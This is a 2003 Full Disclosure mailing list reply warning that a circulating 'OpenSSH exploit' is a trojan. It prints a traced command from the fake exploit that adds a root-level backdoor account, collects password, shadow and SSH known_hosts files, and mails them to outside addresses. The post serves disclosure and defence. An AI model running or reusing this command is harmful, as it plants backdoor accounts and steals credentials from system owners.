Full Disclosure mailing list archives
Re: Re: new openssh exploit in the wild! * is FAKE AS SH@!*
From: Raymond Dijkxhoorn <raymond () prolocation net>
Date: Fri, 19 Sep 2003 11:40:00 +0200 (CEST)
Hi!
i looked at this piece of exploit... it is binary so i'am not sure if this is a trojan or a backdoor or a virus. but i can't see anything strange while sniffing the exploit traffic. and i got root on serveral of my openbsd boxes with that. the bruteforcer seems to be very good.
which is obviously not true. Btw as far as I understand, the troyan code is triggered when the "exploit" is run with the offset specified, and not in a "bruteforcing" mode.
He most likely means, he rooted some of hhis own boxes where he tired to run the 'exploit'. Nice piece of social engineering.
printf("[*] sending shellcode\n")= 22 popen("(echo "sys3:x:0:103::/:/bin/sh" >> /etc/passwd; echo "sys3:\\$1\\$nWXmkX74\\$Ws8fX/MFI3.j5HKahNqIQ0:12311:0:9999 9:7:::" >> /etc/shadow; /sbin/ifconfig -a >/tmp/.tmp;cat /etc/passwd /etc/shadow /root/.ssh*/known_hosts >> /tmp/.tmp; find /home -name known_hosts -exec cat {} >> /tmp/.tmp;cat /tmp/.tmp
|
/usr/sbin/sendmail -f ownage_at_gmx.de m0nkeyhack_at_supermarkt.de) &> /dev/null ; rm -f /tmp/.tmp;", "r") = 0x0804a6b0
Bye, Raymond. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: new openssh exploit in the wild! * is FAKE AS SH@!* Vitaly Osipov (Sep 18)
- Re: Re: new openssh exploit in the wild! * is FAKE AS SH@!* Lars Olsson (Sep 19)
- Re: Re: new openssh exploit in the wild! * is FAKE AS SH@!* christopher neitzert (Sep 19)
- Re: Re: new openssh exploit in the wild! * is FAKE AS SH@!* Raymond Dijkxhoorn (Sep 19)
- Re: Re: new openssh exploit in the wild! * is FAKE AS SH@!* Adam Balogh (Sep 19)
- Re: Re: new openssh exploit in the wild! * isFAKE AS SH@!* V.O. (Sep 19)
- Re: Re: new openssh exploit in the wild! * isFAKE AS SH@!* Adam Balogh (Sep 19)
- RE: Re: new openssh exploit in the wild! *isFAKE AS SH@!* Chris Eagle (Sep 19)
- Re: Re: new openssh exploit in the wild! * isFAKE AS SH@!* V.O. (Sep 19)
- Re: Re: new openssh exploit in the wild! * is FAKE AS SH@!* Lars Olsson (Sep 19)